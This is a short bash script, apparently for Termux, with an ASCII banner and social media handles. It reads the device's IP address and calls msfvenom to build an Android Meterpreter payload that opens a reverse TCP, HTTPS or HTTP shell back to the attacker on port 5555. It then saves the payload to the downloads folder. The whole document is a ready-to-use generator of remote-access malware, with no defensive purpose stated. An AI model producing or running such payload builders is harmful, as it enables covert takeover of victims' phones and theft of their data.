#!/bin/bash
echo "
         ****     ****  ******** ********    **  **     **
        /**/**   **/** **////// /**/////    */* /**    /**
        /**//** ** /**/**       /**        * /* /**    /**
        /** //***  /**/*********/*******  ******/**    /**
        /**  //*   /**////////**/**////  /////* /**    /**
        /**   /    /**       /**/**          /* /**    /**
        /**        /** ******** /**          /* //*******
        //         // ////////  //           /   ///////"
echo""
echo " # facebook.com/virus.system007"
echo " # @rikkimartin.rin"
echo " # YT Exsyio Tech"
echo ""
echo -n "YOUR LPORT IS -> 5555 AND YOUR LHOST IS -> "
ifconfig |
         grep inet |
         awk '{print $2}' |
         sed '/::.*/d' |
         sed '1d' |
         tee -a ip.txt
    echo ""
echo -n "INPUT YOUR PAYLOAD NAME: "
read name
            echo ""
        echo -e "1 -> android reverse shell\n2 -> android reverse https\n3 -> android reverse http\n"
    echo ""
echo -n "INPUT YOUR OPTIONS : "
read option;
     for i in $( cat ip.txt ); do
	case $option in
		1) msfvenom -p android/meterpreter/reverse_tcp LHOST=$i lport=5555 R > $name
			;;
		2) msfvenom -p android/meterpreter/reverse_https lhost=$i lport=5555 R > $name
			;;
		3) msfvenom -p android/meterpreter/reverse_http LHOST=$i lport=5555 R > $name
			;;
		*) break
			;;
       	esac 
    echo ""
   rm ip.txt
 echo "YOUR PAYLOAD SAVED IN"
echo ""
echo "/data/data/com.termux/files/home/storage/downloads/$name"
termux-setup-storage
mv $name /data/data/com.termux/files/home/storage/downloads; done
